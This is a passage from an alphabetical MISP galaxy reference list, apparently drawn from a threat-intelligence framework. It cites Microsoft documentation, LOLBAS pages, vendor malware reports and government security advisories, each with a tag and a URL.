Aaron Kili. (2018, January 16). How to Control Systemd Services on Remote Linux Server. Retrieved July 26, 2021.

The tag is: misp-galaxy:references="Systemd Remote Control"

Table 13896. Table References

Links

https://www.tecmint.com/control-systemd-services-on-remote-linux-server/

Microsoft Admin Shares

Microsoft. (n.d.). How to create and delete hidden or administrative shares on client computers. Retrieved November 20, 2014.

The tag is: misp-galaxy:references="Microsoft Admin Shares"

Table 13897. Table References

Links

http://support.microsoft.com/kb/314984

Delpy Mimikatz Crendential Manager

Delpy, B. (2017, December 12). howto ~ credential manager saved credentials. Retrieved November 23, 2020.

The tag is: misp-galaxy:references="Delpy Mimikatz Crendential Manager"

Table 13898. Table References

Links

https://github.com/gentilkiwi/mimikatz/wiki/howto--credential-manager-saved-credentials

Stealthbits Overpass-the-Hash

Warren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021.

The tag is: misp-galaxy:references="Stealthbits Overpass-the-Hash"

Table 13899. Table References

Links

https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/

Stealthbits Detect PtT 2019

Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket Attacks. Retrieved February 27, 2020.

The tag is: misp-galaxy:references="Stealthbits Detect PtT 2019"

Table 13900. Table References

Links

https://blog.stealthbits.com/detect-pass-the-ticket-attacks

WindowsIR Anti-Forensic Techniques

Carvey, H. (2013, July 23). HowTo: Determine/Detect the use of Anti-Forensics Techniques. Retrieved June 3, 2016.

The tag is: misp-galaxy:references="WindowsIR Anti-Forensic Techniques"

Table 13901. Table References

Links

http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html

Microsoft Disable Autorun

Microsoft. (n.d.). How to disable the Autorun functionality in Windows. Retrieved April 20, 2016.

The tag is: misp-galaxy:references="Microsoft Disable Autorun"

Table 13902. Table References

Links

https://support.microsoft.com/en-us/kb/967715

Superuser Linux Password Policies

Matutiae, M. (2014, August 6). How to display password policy information for a user (Ubuntu)?. Retrieved April 5, 2018.

The tag is: misp-galaxy:references="Superuser Linux Password Policies"

Table 13903. Table References

Links

https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu

Confluence Linux Command Line

Confluence Support. (2021, September 8). How to enable command line audit logging in linux. Retrieved September 23, 2021.

The tag is: misp-galaxy:references="Confluence Linux Command Line"

Table 13904. Table References

Links

https://confluence.atlassian.com/confkb/how-to-enable-command-line-audit-logging-in-linux-956166545.html

Atlassian Confluence Logging

Atlassian. (2018, January 9). How to Enable User Access Logging. Retrieved April 4, 2018.

The tag is: misp-galaxy:references="Atlassian Confluence Logging"

Table 13905. Table References

Links

https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html

Remote Shell Execution in Python

Abdou Rockikz. (2020, July). How to Execute Shell Commands in a Remote Machine in Python. Retrieved July 26, 2021.

The tag is: misp-galaxy:references="Remote Shell Execution in Python"

Table 13906. Table References

Links

https://www.thepythoncode.com/article/executing-bash-commands-remotely-in-python

Find Wi-Fi Password on Mac

Ruslana Lishchuk. (2021, March 26). How to Find a Saved Wi-Fi Password on a Mac. Retrieved September 8, 2023.

The tag is: misp-galaxy:references="Find Wi-Fi Password on Mac"

Table 13907. Table References

Links

https://mackeeper.com/blog/find-wi-fi-password-on-mac/

Microsoft Web Root OCT 2016

Microsoft. (2016, October 20). How to: Find the Web Application Root. Retrieved July 27, 2018.

The tag is: misp-galaxy:references="Microsoft Web Root OCT 2016"

Microsoft Replication ACL

Microsoft. (n.d.). How to grant the "Replicating Directory Changes" permission for the Microsoft Metadirectory Services ADMA service account. Retrieved December 4, 2017.

The tag is: misp-galaxy:references="Microsoft Replication ACL"

Table 13908. Table References

Links

https://support.microsoft.com/help/303972/how-to-grant-the-replicating-directory-changes-permission-for-the-micr

Hide GDM User Accounts

Ji Mingkui. (2021, June 17). How to Hide All The User Accounts in Ubuntu 20.04, 21.04 Login Screen. Retrieved March 15, 2022.

The tag is: misp-galaxy:references="Hide GDM User Accounts"

Table 13909. Table References

Links

https://ubuntuhandbook.org/index.php/2021/06/hide-user-accounts-ubuntu-20-04-login-screen/

Elastic COM Hijacking

Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting Persistence & Evasion with the COM. Retrieved September 15, 2016.

The tag is: misp-galaxy:references="Elastic COM Hijacking"

Table 13910. Table References

Links

https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com

Elastic Masquerade Ball

Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.

The tag is: misp-galaxy:references="Elastic Masquerade Ball"

Table 13911. Table References

Links

https://www.elastic.co/blog/how-hunt-masquerade-ball

Linux Loadable Kernel Module Insert and Remove LKMs

Henderson, B. (2006, September 24). How To Insert And Remove LKMs. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Linux Loadable Kernel Module Insert and Remove LKMs"

Table 13912. Table References

Links

http://tldp.org/HOWTO/Module-HOWTO/x197.html

DigiCert Install SSL Cert

DigiCert. (n.d.). How to Install an SSL Certificate. Retrieved April 19, 2021.

The tag is: misp-galaxy:references="DigiCert Install SSL Cert"

Table 13913. Table References

Links

https://www.digicert.com/kb/ssl-certificate-installation.htm

HowToGeek ShowExtension

Chris Hoffman. (2017, March 8). How to Make Windows Show File Extensions. Retrieved August 4, 2021.

The tag is: misp-galaxy:references="HowToGeek ShowExtension"

Table 13914. Table References

Links

https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/

Microsoft RDP Removal

Microsoft. (2021, September 24). How to remove entries from the Remote Desktop Connection Computer box. Retrieved June 15, 2022.

The tag is: misp-galaxy:references="Microsoft RDP Removal"

Table 13915. Table References

Links

https://docs.microsoft.com/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer

Startup Items Eclectic

hoakley. (2021, September 16). How to run an app or tool at startup. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="Startup Items Eclectic"

Table 13916. Table References

Links

https://eclecticlight.co/2021/09/16/how-to-run-an-app-or-tool-at-startup/

Microsoft Disable VBA Jan 2020

Microsoft. (2020, January 23). How to turn off Visual Basic for Applications when you deploy Office. Retrieved September 17, 2020.

The tag is: misp-galaxy:references="Microsoft Disable VBA Jan 2020"

Table 13917. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/turn-off-visual-basic-for-application

Microsoft Regsvr32

Microsoft. (2015, August 14). How to use the Regsvr32 tool and troubleshoot Regsvr32 error messages. Retrieved June 22, 2016.

The tag is: misp-galaxy:references="Microsoft Regsvr32"

Table 13918. Table References

Links

https://support.microsoft.com/en-us/kb/249873

Microsoft SAM

Microsoft. (2006, October 30). How to use the SysKey utility to secure the Windows Security Accounts Manager database. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="Microsoft SAM"

Table 13919. Table References

Links

https://support.microsoft.com/en-us/kb/310105

AWS Traffic Mirroring

Amazon Web Services. (n.d.). How Traffic Mirroring works. Retrieved March 17, 2022.

The tag is: misp-galaxy:references="AWS Traffic Mirroring"

Table 13920. Table References

Links

https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html

Symantec Hydraq Persistence Jan 2010

Fitzgerald, P. (2010, January 26). How Trojan.Hydraq Stays On Your Computer. Retrieved February 22, 2018.

The tag is: misp-galaxy:references="Symantec Hydraq Persistence Jan 2010"

Table 13921. Table References

Links

https://www.symantec.com/connect/blogs/how-trojanhydraq-stays-your-computer

Microsoft UAC Nov 2018

Montemayor, D. et al.. (2018, November 15). How User Account Control works. Retrieved June 3, 2019.

The tag is: misp-galaxy:references="Microsoft UAC Nov 2018"

Table 13922. Table References

Links

https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works

TechNet How UAC Works

Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016.

The tag is: misp-galaxy:references="TechNet How UAC Works"

Table 13923. Table References

Links

https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works

PWC WellMess July 2020

PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020.

The tag is: misp-galaxy:references="PWC WellMess July 2020"

Table 13924. Table References

Links

https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html

Google Election Threats October 2020

Huntley, S. (2020, October 16). How We’re Tackling Evolving Online Threats. Retrieved March 24, 2021.

The tag is: misp-galaxy:references="Google Election Threats October 2020"

Table 13925. Table References

Links

https://blog.google/threat-analysis-group/how-were-tackling-evolving-online-threats/

Microsoft Credential Guard April 2017

Lich, B., Tobin, J. (2017, April 5). How Windows Defender Credential Guard works. Retrieved November 27, 2017.

The tag is: misp-galaxy:references="Microsoft Credential Guard April 2017"

Table 13926. Table References

Links

https://docs.microsoft.com/windows/access-protection/credential-guard/credential-guard-how-it-works

NPPSPY Video

Grzegorz Tworek. (2021, December 14). How winlogon.exe shares the cleartext password with custom DLLs. Retrieved March 30, 2023.

The tag is: misp-galaxy:references="NPPSPY Video"

Table 13927. Table References

Links

https://www.youtube.com/watch?v=ggY3srD9dYs

Cylance Sodinokibi July 2019

Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020.

The tag is: misp-galaxy:references="Cylance Sodinokibi July 2019"

Table 13928. Table References

Links

https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html

Wikipedia HTML Application

Wikipedia. (2017, October 14). HTML Application. Retrieved October 27, 2017.

The tag is: misp-galaxy:references="Wikipedia HTML Application"

Table 13929. Table References

Links

https://en.wikipedia.org/wiki/HTML_Application

MSDN HTML Applications

Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017.

The tag is: misp-galaxy:references="MSDN HTML Applications"

Table 13930. Table References

Links

https://msdn.microsoft.com/library/ms536471.aspx

Microsoft HTML Help ActiveX

Microsoft. (n.d.). HTML Help ActiveX Control Overview. Retrieved October 3, 2018.

The tag is: misp-galaxy:references="Microsoft HTML Help ActiveX"

Table 13931. Table References

Links

https://msdn.microsoft.com/windows/desktop/ms644670

Outlflank HTML Smuggling 2018

Hegt, S. (2018, August 14). HTML smuggling explained. Retrieved May 20, 2021.

The tag is: misp-galaxy:references="Outlflank HTML Smuggling 2018"

Table 13932. Table References

Links

https://outflank.nl/blog/2018/08/14/html-smuggling-explained/

CrowdStrike Linux Rootkit

Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017.

The tag is: misp-galaxy:references="CrowdStrike Linux Rootkit"

Table 13933. Table References

Links

https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/

Wikipedia HPKP

Wikipedia. (2017, February 28). HTTP Public Key Pinning. Retrieved March 31, 2017.

The tag is: misp-galaxy:references="Wikipedia HPKP"

Table 13934. Table References

Links

https://en.wikipedia.org/wiki/HTTP_Public_Key_Pinning

Cobalt Strike Arguments 2019

Mudge, R. (2019, January 2). https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/. Retrieved November 19, 2021.

The tag is: misp-galaxy:references="Cobalt Strike Arguments 2019"

Table 13935. Table References

Links

https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/

Talos Discord Webhook Abuse

Nick Biasini, Edmund Brumaghin, Chris Neal, and Paul Eubanks. (2021, April 7). https://blog.talosintelligence.com/collab-app-abuse/. Retrieved July 20, 2023.

The tag is: misp-galaxy:references="Talos Discord Webhook Abuse"

Table 13936. Table References

Links

https://blog.talosintelligence.com/collab-app-abuse/

Red Canary Emotet Feb 2019

Donohue, B.. (2019, February 13). https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="Red Canary Emotet Feb 2019"

Table 13937. Table References

Links

https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/

TechNet Removable Media Control

Microsoft. (2007, August 31). https://technet.microsoft.com/en-us/library/cc771759(v=ws.10).aspx. Retrieved April 20, 2016.

The tag is: misp-galaxy:references="TechNet Removable Media Control"

Table 13938. Table References

Links

https://technet.microsoft.com/en-us/library/cc772540(v=ws.10).aspx

Chromium HSTS

Chromium. (n.d.). HTTP Strict Transport Security. Retrieved May 24, 2023.

The tag is: misp-galaxy:references="Chromium HSTS"

Table 13939. Table References

Links

https://www.chromium.org/hsts/

CISA AA20-301A Kimsuky

CISA, FBI, CNMF. (2020, October 27). https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020.

The tag is: misp-galaxy:references="CISA AA20-301A Kimsuky"

Table 13940. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/aa20-301a

FireEye Targeted Attacks Middle East Banks

Singh, S., Yin, H. (2016, May 22). https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html. Retrieved April 5, 2018.

The tag is: misp-galaxy:references="FireEye Targeted Attacks Middle East Banks"

Table 13941. Table References

Links

https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html

Microsoft Subscription Hijacking 2022

Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.

The tag is: misp-galaxy:references="Microsoft Subscription Hijacking 2022"

Table 13943. Table References

Links

https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121

crowdstrike bpf socket filters

Jamie Harries. (2022, May 25). Hunting a Global Telecommunications Threat: DecisiveArchitect and Its Custom Implant JustForFun. Retrieved October 18, 2022.

The tag is: misp-galaxy:references="crowdstrike bpf socket filters"

Table 13944. Table References

Links

https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/

Koczwara Beacon Hunting Sep 2021

Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="Koczwara Beacon Hunting Sep 2021"

Table 13945. Table References

Links

https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

Fireeye Hunting COM June 2019

Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.

The tag is: misp-galaxy:references="Fireeye Hunting COM June 2019"

Table 13946. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html

Berba hunting linux systemd

Pepe Berba. (2022, January 30). Hunting for Persistence in Linux (Part 3): Systemd, Timers, and Cron. Retrieved March 20, 2023.

The tag is: misp-galaxy:references="Berba hunting linux systemd"

Table 13947. Table References

Links

https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/

Elastic HuntingNMemory June 2017

Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December 7, 2017.

The tag is: misp-galaxy:references="Elastic HuntingNMemory June 2017"

Table 13948. Table References

Links

https://www.endgame.com/blog/technical-blog/hunting-memory

LogPoint Hunting LockBit

LogPoint. (n.d.). Hunting LockBit Variations using Logpoint. Retrieved May 19, 2023.

The tag is: misp-galaxy:references="LogPoint Hunting LockBit"

Table 13949. Table References

Links

https://www.logpoint.com/wp-content/uploads/2022/10/hunting-lockbit-variations-using-logpoint-.pdf

Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023

FBI et al. (2023, May 9). Hunting Russian Intelligence “Snake” Malware. Retrieved June 8, 2023.

The tag is: misp-galaxy:references="Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023"

Table 13950. Table References

Links

https://www.cisa.gov/sites/default/files/2023-05/aa23-129a_snake_malware_2.pdf

Falcon Sandbox smp: 28553b3a9d

Hybrid Analysis. (2018, July 11). HybridAnalsysis of sample 28553b3a9d2ad4361d33d29ac4bf771d008e0073cec01b5561c6348a608f8dd7. Retrieved September 8, 2023.

The tag is: misp-galaxy:references="Falcon Sandbox smp: 28553b3a9d"

Table 13951. Table References

Links

https://www.hybrid-analysis.com/sample/28553b3a9d2ad4361d33d29ac4bf771d008e0073cec01b5561c6348a608f8dd7?environmentId=300

Wikipedia Hypervisor

Wikipedia. (2016, May 23). Hypervisor. Retrieved June 11, 2016.

The tag is: misp-galaxy:references="Wikipedia Hypervisor"

Table 13952. Table References

Links

https://en.wikipedia.org/wiki/Hypervisor

FireEye ADFS

Bierstock, D., Baker, A. (2019, March 21). I am AD FS and So Can You. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="FireEye ADFS"

Table 13953. Table References

Links

https://www.troopers.de/troopers19/agenda/fpxwmn/

AWS EKS IAM Roles for Service Accounts

Amazon Web Services. (n.d.). IAM roles for service accounts. Retrieved July 14, 2023.

The tag is: misp-galaxy:references="AWS EKS IAM Roles for Service Accounts"

Table 13954. Table References

Links

https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts.html

Kaspersky IAmTheKing October 2020

Ivan Kwiatkowski, Pierre Delcher, Felix Aime. (2020, October 15). IAmTheKing and the SlothfulMedia malware family. Retrieved October 15, 2020.

The tag is: misp-galaxy:references="Kaspersky IAmTheKing October 2020"

Table 13955. Table References

Links

https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/

Amazon IAM Groups

Amazon. (n.d.). IAM user groups. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Amazon IAM Groups"

Table 13956. Table References

Links

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html

CrowdStrike IceApple May 2022

CrowdStrike. (2022, May). ICEAPPLE: A NOVEL INTERNET INFORMATION SERVICES (IIS) POST-EXPLOITATION FRAMEWORK. Retrieved June 27, 2022.

The tag is: misp-galaxy:references="CrowdStrike IceApple May 2022"

Table 13957. Table References

Links

https://www.crowdstrike.com/wp-content/uploads/2022/05/crowdstrike-iceapple-a-novel-internet-information-services-post-exploitation-framework.pdf

ICIT China’s Espionage Jul 2016

Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018.

The tag is: misp-galaxy:references="ICIT China’s Espionage Jul 2016"

Table 13958. Table References

Links

https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/

CISA ICS Advisory ICSA-10-272-01

CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020.

The tag is: misp-galaxy:references="CISA ICS Advisory ICSA-10-272-01"

Table 13959. Table References

Links

https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01

US-CERT Ukraine Feb 2016

US-CERT. (2016, February 25). ICS Alert (IR-ALERT-H-16-056-01) Cyber-Attack Against Ukrainian Critical Infrastructure. Retrieved June 10, 2020.

The tag is: misp-galaxy:references="US-CERT Ukraine Feb 2016"

Table 13960. Table References

Links

https://www.us-cert.gov/ics/alerts/IR-ALERT-H-16-056-01

Dragos Threat Report 2020

Dragos. (n.d.). ICS Cybersecurity Year in Review 2020. Retrieved February 25, 2021.

The tag is: misp-galaxy:references="Dragos Threat Report 2020"

Table 13961. Table References

Links

https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770

Cisco Advisory SNMP v3 Authentication Vulnerabilities

Cisco. (2008, June 10). Identifying and Mitigating Exploitation of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Cisco Advisory SNMP v3 Authentication Vulnerabilities"

Table 13962. Table References

Links

https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3

Resource and Data Forks

Flylib. (n.d.). Identifying Resource and Data Forks. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="Resource and Data Forks"

Table 13963. Table References

Links

https://flylib.com/books/en/4.395.1.192/1/

AWS Identity Federation

Amazon. (n.d.). Identity Federation in AWS. Retrieved March 13, 2020.

The tag is: misp-galaxy:references="AWS Identity Federation"

Table 13964. Table References

Links

https://aws.amazon.com/identity/federation/

Microsoft GetNCCChanges

Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December 4, 2017.

The tag is: misp-galaxy:references="Microsoft GetNCCChanges"

Table 13965. Table References

Links

https://msdn.microsoft.com/library/dd207691.aspx

Ie4uinit.exe - LOLBAS Project

LOLBAS. (2018, May 25). Ie4uinit.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Ie4uinit.exe - LOLBAS Project"

Table 13966. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/

Ieadvpack.dll - LOLBAS Project

LOLBAS. (2018, May 25). Ieadvpack.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Ieadvpack.dll - LOLBAS Project"

Table 13967. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/

iediagcmd.exe - LOLBAS Project

LOLBAS. (2022, March 29). iediagcmd.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="iediagcmd.exe - LOLBAS Project"

Table 13968. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Iediagcmd/

Wikipedia 802.1x

Wikipedia. (2018, March 30). IEEE 802.1X. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Wikipedia 802.1x"

Table 13969. Table References

Links

https://en.wikipedia.org/wiki/IEEE_802.1X

Ieexec.exe - LOLBAS Project

LOLBAS. (2018, May 25). Ieexec.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Ieexec.exe - LOLBAS Project"

Table 13970. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ieexec/

Ieframe.dll - LOLBAS Project

LOLBAS. (2018, May 25). Ieframe.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Ieframe.dll - LOLBAS Project"

Table 13971. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Ieframe/

Wikipedia Ifconfig

Wikipedia. (2016, January 26). ifconfig. Retrieved April 17, 2016.

The tag is: misp-galaxy:references="Wikipedia Ifconfig"

Table 13972. Table References

Links

https://en.wikipedia.org/wiki/Ifconfig

EFF Manul Aug 2016

Galperin, E., Et al.. (2016, August). I Got a Letter From the Government the Other Day…​. Retrieved April 25, 2018.

The tag is: misp-galaxy:references="EFF Manul Aug 2016"

Table 13973. Table References

Links

https://www.eff.org/files/2016/08/03/i-got-a-letter-from-the-government.pdf

IIS Backdoor 2011

Julien. (2011, February 2). IIS Backdoor. Retrieved June 3, 2021.

The tag is: misp-galaxy:references="IIS Backdoor 2011"

Table 13974. Table References

Links

https://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html

Microsoft IIS Modules Overview 2007

Microsoft. (2007, November 24). IIS Modules Overview. Retrieved June 17, 2021.

The tag is: misp-galaxy:references="Microsoft IIS Modules Overview 2007"

Table 13975. Table References

Links

https://docs.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview

Ilasm.exe - LOLBAS Project

LOLBAS. (2020, March 17). Ilasm.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Ilasm.exe - LOLBAS Project"

Table 13976. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ilasm/

anomali-rocke-tactics

Anomali Threat Research. (2019, October 15). Illicit Cryptomining Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="anomali-rocke-tactics"

Table 13977. Table References

Links

https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect

Microsoft Dev Blog IFEO Mar 2010

Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). Retrieved December 18, 2017.

The tag is: misp-galaxy:references="Microsoft Dev Blog IFEO Mar 2010"

Table 13978. Table References

Links

https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/

IMEWDBLD.exe - LOLBAS Project

LOLBAS. (2020, March 5). IMEWDBLD.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="IMEWDBLD.exe - LOLBAS Project"

Table 13979. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/

Imminent Unit42 Dec2019

Unit 42. (2019, December 2). Imminent Monitor – a RAT Down Under. Retrieved May 5, 2020.

The tag is: misp-galaxy:references="Imminent Unit42 Dec2019"

Table 13980. Table References

Links

https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/

Core Security Impacket

Core Security. (n.d.). Impacket. Retrieved November 2, 2017.

The tag is: misp-galaxy:references="Core Security Impacket"

Table 13981. Table References

Links

https://www.coresecurity.com/core-labs/open-source-tools/impacket

Impacket Tools

SecureAuth. (n.d.). Retrieved January 15, 2019.

The tag is: misp-galaxy:references="Impacket Tools"

Table 13982. Table References

Links

https://www.secureauth.com/labs/open-source-tools/impacket

EK Impeding Malware Analysis

Song, C., et al. (2012, August 7). Impeding Automated Malware Analysis with Environment-sensitive Malware. Retrieved January 18, 2019.

The tag is: misp-galaxy:references="EK Impeding Malware Analysis"

Table 13983. Table References

Links

https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf

Microsoft Impersonation and EWS in Exchange

Microsoft. (2022, September 13). Impersonation and EWS in Exchange. Retrieved July 10, 2023.

The tag is: misp-galaxy:references="Microsoft Impersonation and EWS in Exchange"

Table 13984. Table References

Links

https://learn.microsoft.com/en-us/exchange/client-developer/exchange-web-services/impersonation-and-ews-in-exchange

Microsoft Implementing CPL

  1. (n.d.). Implementing Control Panel Items. Retrieved January 18, 2018.

The tag is: misp-galaxy:references="Microsoft Implementing CPL"

Table 13985. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx

TechNet Least Privilege

Microsoft. (2016, April 16). Implementing Least-Privilege Administrative Models. Retrieved June 3, 2016.

The tag is: misp-galaxy:references="TechNet Least Privilege"

Table 13986. Table References

Links

https://technet.microsoft.com/en-us/library/dn487450.aspx

Dragos IT ICS Ransomware

Slowik, J.. (2019, April 10). Implications of IT Ransomware for ICS Environments. Retrieved January 28, 2021.

The tag is: misp-galaxy:references="Dragos IT ICS Ransomware"

Table 13987. Table References

Links

https://www.dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/

Microsoft SolarWinds Steps

Lambert, J. (2020, December 13). Important steps for customers to protect themselves from recent nation-state cyberattacks. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="Microsoft SolarWinds Steps"

Table 13988. Table References

Links

https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/

White House Imposing Costs RU Gov April 2021

White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021.

The tag is: misp-galaxy:references="White House Imposing Costs RU Gov April 2021"

Table 13989. Table References

Links

https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/

Malicious Driver Reporting Center

Azure Edge and Platform Security Team & Microsoft 365 Defender Research Team. (2021, December 8). Improve kernel security with the new Microsoft Vulnerable and Malicious Driver Reporting Center. Retrieved April 6, 2022.

The tag is: misp-galaxy:references="Malicious Driver Reporting Center"

Table 13990. Table References

Links

https://www.microsoft.com/security/blog/2021/12/08/improve-kernel-security-with-the-new-microsoft-vulnerable-and-malicious-driver-reporting-center/

Unit 42 Inception November 2018

Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020.

The tag is: misp-galaxy:references="Unit 42 Inception November 2018"

Table 13991. Table References

Links

https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/

Symantec Inception Framework March 2018

Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020.

The tag is: misp-galaxy:references="Symantec Inception Framework March 2018"

Table 13992. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies

Expel AWS Attacker

Brian Bahtiarian, David Blanton, Britton Manahan and Kyle Pellett. (2022, April 5). Incident report: From CLI to console, chasing an attacker in AWS. Retrieved April 7, 2022.

The tag is: misp-galaxy:references="Expel AWS Attacker"

Table 13993. Table References

Links

https://expel.com/blog/incident-report-from-cli-to-console-chasing-an-attacker-in-aws/

Dark Reading Microsoft 365 Attacks 2021

Kelly Sheridan. (2021, August 5). Incident Responders Explore Microsoft 365 Attacks in the Wild. Retrieved March 17, 2023.

The tag is: misp-galaxy:references="Dark Reading Microsoft 365 Attacks 2021"

Table 13994. Table References

Links

https://www.darkreading.com/threat-intelligence/incident-responders-explore-microsoft-365-attacks-in-the-wild/d/d-id/1341591

U.S. CISA Increased Truebot Activity July 6 2023

Cybersecurity and Infrastructure Security Agency. (2023, July 6). Increased Truebot Activity Infects U.S. and Canada Based Networks. Retrieved July 6, 2023.

The tag is: misp-galaxy:references="U.S. CISA Increased Truebot Activity July 6 2023"

Table 13995. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-187a

Increasing Linux kernel integrity

Boelen, M. (2015, October 7). Increase kernel integrity with disabled Linux kernel modules loading. Retrieved June 4, 2020.

The tag is: misp-galaxy:references="Increasing Linux kernel integrity"

Table 13996. Table References

Links

https://linux-audit.com/increase-kernel-integrity-with-disabled-linux-kernel-modules-loading/

TechNet Scheduling Priority

Microsoft. (2013, May 8). Increase scheduling priority. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="TechNet Scheduling Priority"

Table 13997. Table References

Links

https://technet.microsoft.com/library/dn221960.aspx

Revil Independence Day

